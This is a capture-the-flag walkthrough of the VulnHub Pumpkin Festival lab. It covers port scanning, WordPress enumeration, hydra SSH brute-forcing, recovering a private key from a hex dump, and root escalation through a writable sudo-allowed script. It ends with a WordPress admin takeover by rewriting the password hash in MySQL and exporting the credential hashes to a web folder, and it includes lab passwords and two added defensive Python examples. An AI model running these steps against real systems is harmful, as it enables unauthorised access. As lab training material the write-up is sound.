VulnHub Mission Pumpkin v1.0 (3/3): Festival (Walkthrough)

What do we know?

In this level (Level 3) it is time for the Pumpkin Festival. The goal is to reach root, access PumpkinFestival_Ticket and collect the PumpkinTokens along the way.

Reconnaissance / Vulnerability Enumeration

This machine is up and running at
nmap -A -T4 -p-
21/tcp   open  ftp     vsftpd 2.0.8 or later
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
6880/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13

FTP Service Analysis (port 21)

ftp 21
Token 1 (FTP:secret/token.txt)
PumpkinToken : 2d6dbbae84d724409606eddd9dd71265

HTTP Service Analysis (port 80)

Token 2 (HTTP:index.html)
PumpkinToken : 45d9ee7239bc6b0bb21d3f8e1c5faa52
Possible users:
- Harry (harry)
- Jack (jack)
echo -e "harry\njack" > usuários.txt

Searching for files and directories (HTTP on port 80)

Token 3 (HTTP:Wordpress Home:pumpkins.local)
PumpkinToken : 06c3eb12ef2389e2752335beccfb2080
gobuster dir -u -x php,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
dirsearch -u -x 403,404,500 -e php,html,txt,jpg,gif,png,zip,tar,gz,gpg,pem -rR 5 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
Token 4 (HTTP:/tokens/token.txt)
PumpkinToken : 2c0e11d2200e2604587c331f02a7ebea

WordPress CMS Analysis (pumpkins.local)

wpscan --url http://pumpkins.local/ --enumerate at,ap,u
Token 5 (HTTP:Wordpress:/license.txt)
PumpkinToken : 5ff346114d634a015ce413e1bc3d8d71

Decoding BaseN


Accessing the WordPress CMS

Token 6 (HTTP:Wordpress:/user:morse/profile.php)
PumpkinToken : 7139e925fd43618653e51f820bc6201b

SSH Analysis (port 6880)

User: jack
Password: Ug0t!TrIpyJ
ssh jack@pumpkins.local -p 6880
hydra -e nsr -L usuários.txt -P /usr/share/wordlists/rockyou.txt pumpkins.local ssh -s 6880 -I -F
The “-e nsr” option tries variations of each username as candidate passwords: an empty password (n), the username itself (s) and the username reversed (r).
nmap -sV -p6880 --script ssh-auth-methods.nse pumpkins.local

FTP Access (port 21)

hydra -e nsr -L usuários.txt -P /usr/share/wordlists/rockyou.txt pumpkins.local ssh -s 6880 -I -F
User: harry
Password: yrrah
Token 7 (FTP:/home/harry/token.txt)
PumpkinToken : ba9fa9abf2be9373b7cbd9a6457f374e
Token 8 (FTP:/home/harry/Donotopen/NO/NOO/NOOO/NOOOO/token.txt)
PumpkinToken : f9c5053d01e0dfc30066476ab0f0564c
file data.txt
data.txt: POSIX tar archive
cat jack | xxd -r -p

SSH Access (port 6880)

cat jack | xxd -r -p > /root/.ssh/id_rsa
ssh jack@pumpkins.local -p 6880

Fixing permissions

useradd --no-create-home --no-user-group --shell=/bin/false jack
chown jack /root/.ssh/id_rsa
userdel --remove --force jack
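The `jack` file is a plain hex dump, so `xxd -r -p` turns it back into the key, and ssh will only use the result once the file is readable by nobody but its owner. The following is an added example written for this walkthrough, not code from the original post: `decode_hex_dump()` does what `xxd -r -p` does, a sanity check confirms the bytes look like a PEM key before anything lands in `~/.ssh`, and `write_private_key()` creates the file as mode 0600 from the first byte instead of chowning it afterwards. The hex dump embedded below is constructed from placeholder PEM marker lines and is not a real key; the function names are mine.

```python
"""Rebuild a private key from a hex dump and store it with the mode ssh expects.

Added example, not from the original post. decode_hex_dump() mirrors what
`xxd -r -p` does for the hex-encoded `jack` file; write_private_key() then
creates the file with mode 0600, which ssh requires before it will use a key.
The hex dump below is constructed from placeholder text and is not a real key.
"""
import os
import re
import stat
import tempfile

# Constructed: hex of two PEM marker lines, folded across lines like a dump would be.
SAMPLE_DUMP = """\
2d2d2d2d2d424547494e204f50454e5353482050524956415445204b45592d2d2d2d2d0a
2d2d2d2d2d454e44204f50454e5353482050524956415445204b45592d2d2d2d2d0a
"""


def decode_hex_dump(text):
    """Turn plain hex (whitespace and newlines ignored) back into bytes."""
    cleaned = re.sub(r"\s+", "", text)
    if len(cleaned) % 2:
        raise ValueError("hex dump has an odd number of digits")
    return bytes.fromhex(cleaned)  # raises ValueError on non-hex characters


def looks_like_private_key(data):
    """Cheap sanity check before writing anything into ~/.ssh."""
    return data.startswith(b"-----BEGIN ") and b"PRIVATE KEY-----" in data


def write_private_key(path, data):
    """Create the key file as 0600 from the start; return the mode found on disk."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    # O_CREAT's mode is masked by umask and ignored for a pre-existing file,
    # so enforce it explicitly as well.
    os.chmod(path, 0o600)
    return stat.S_IMODE(os.stat(path).st_mode)


def restore_key(dump_text, path):
    """Decode, validate and store the key; returns the mode actually set."""
    data = decode_hex_dump(dump_text)
    if not looks_like_private_key(data):
        raise ValueError("decoded data does not look like a PEM private key")
    return write_private_key(path, data)


def demo():
    """Run restore_key() on the constructed dump inside a temp dir; return the mode."""
    with tempfile.TemporaryDirectory() as tmp:
        return restore_key(SAMPLE_DUMP, os.path.join(tmp, "id_rsa"))


if __name__ == "__main__":
    print(oct(demo()))  # 0o600
```

Creating the file with the final mode at `open()` time, rather than writing it and chmod'ing later, avoids the short window in which a freshly written key is readable by every local user.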

Privilege Escalation

Token 9 (SSH:/home/jack/token)
PumpkinToken : 8d66ef0055b43d80c34917ec6c75f706
sudo -l
mkdir /home/jack/pumpkins
echo "/bin/sh -i" > /home/jack/pumpkins/alohomora
chmod +x ~/pumpkins/alohomora
sudo ~/pumpkins/alohomora
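The escalation above works because the rule `sudo -l` reveals points at a path inside jack's own home directory, so whatever file sits there runs as root. A small audit for rules of that shape, as an added example written for this walkthrough and not part of the original post: it parses a constructed sudoers fragment (only the `jack` line is modelled on the box; the other lines, the home-directory map and the list of world-writable directories are assumptions) and flags every command whose executable lives under the rule's user's home or a world-writable directory, or that is `ALL` or a wildcard.

```python
"""Audit sudoers rules for commands that live in a path the rule's user can write to.

Added example (not from the original post): the jack line mirrors the rule
sudo -l exposes in the walkthrough; the other lines, the home-directory map and
the list of world-writable directories are assumptions.
"""
import os
import re

# Constructed sudoers fragment. Only the jack rule is modelled on the machine.
SAMPLE_SUDOERS = """\
Defaults env_reset
root    ALL=(ALL:ALL) ALL
# the rule the walkthrough's escalation relies on
jack    ALL=(ALL) NOPASSWD: /home/jack/pumpkins/alohomora
harry   ALL=(root) /usr/bin/less /var/log/syslog
"""

# user host=(runas) [TAG: ...] command[, command ...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

WORLD_WRITABLE = ("/tmp", "/var/tmp", "/dev/shm")


def parse_rules(text):
    """Return one dict per (user, command) pair found in a sudoers fragment."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd:
                rules.append({
                    "user": m.group("user"),
                    "runas": m.group("runas") or "root",
                    "nopasswd": "NOPASSWD" in m.group("tags"),
                    "command": cmd,
                })
    return rules


def _under(path, directory):
    return os.path.commonpath([path, directory]) == directory


def user_controlled(command, user, home_dirs, writable_dirs=WORLD_WRITABLE):
    """Explain why the user could change what this command runs, or None if fine."""
    exe = command.split()[0]
    if exe == "ALL":
        return "rule grants ALL commands"
    if any(ch in exe for ch in "*?"):
        return "wildcard in command path"
    if not exe.startswith("/"):
        return "command path is not absolute"
    home = home_dirs.get(user)
    if home and _under(exe, home):
        return f"executable under {user}'s home directory {home}"
    for d in writable_dirs:
        if _under(exe, d):
            return f"executable under world-writable directory {d}"
    return None


def find_risky_rules(text, home_dirs, writable_dirs=WORLD_WRITABLE):
    """Return (user, command, reason) for every rule a non-root user could abuse."""
    findings = []
    for rule in parse_rules(text):
        if rule["user"] == "root":
            continue
        reason = user_controlled(rule["command"], rule["user"], home_dirs, writable_dirs)
        if reason:
            findings.append((rule["user"], rule["command"], reason))
    return findings


if __name__ == "__main__":
    homes = {"jack": "/home/jack", "harry": "/home/harry"}
    for user, command, reason in find_risky_rules(SAMPLE_SUDOERS, homes):
        print(f"{user}: {command}  <- {reason}")
```

On a live system the home map would come from `/etc/passwd` and the rule text from `visudo -c` or `sudo -l -U <user>`; the fix for a flagged rule is to move the script to a root-owned directory such as `/usr/local/sbin` and reference that path instead.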

Hunting for the last token

Accessing the “admin” account (Method 1: Wordlist)

cewl -w wordlistPumpkin.txt
wpscan -U admin -P wordlistPumpkin.txt --url http://pumpkins.local/
for i in $(cat wordlistPumpkin.txt); do grep -- "$i" /usr/share/wordlists/rockyou.txt | grep -x '.\{4,15\}' >> wordlistPumpkin.txt; done; sort -u -o wordlistPumpkin.txt wordlistPumpkin.txt
New file created with 322,693 strings (previously there were only 36)
wpscan -U admin -P wordlistPumpkin.txt --url http://pumpkins.local/

Accessing the “admin” account (Method 2: Update DB)

ls /etc/apache2/sites-available/
cat /etc/apache2/sites-available/web.conf
ls /home/web/*.php -lh
mysql -uroot -p
Enter password: root
show databases;
use pumpkins;
show tables;
describe wp_users;
select user_login,user_pass from wp_users;
update wp_users
set user_pass = '$P$BCvOKficMcCyBtPxjoiM8S8SFBfWUj1'
where user_login = 'admin';

Accessing the “admin” account (Method 3: Export DB Login/Pass Hash)

select concat_ws(':', user_login, user_pass) as 'Pumpkins User/Pass Wordpress' from wp_users;
select concat_ws(':', user_login, user_pass) from wp_users into outfile '/home/web/wp-content/uploads/credenciais.txt';

Reading the last token

Token 10 (HTTP:Wordpress/user admin:/wp-admin/post.php)
PumpkinToken : f2e00edc353309b40e1aed18e18ab2c4

Final considerations




André Henrique
Cybersecurity & IT Consultant, Pentester and Writer. Loves: Computer Networking, Programming and Hacking!!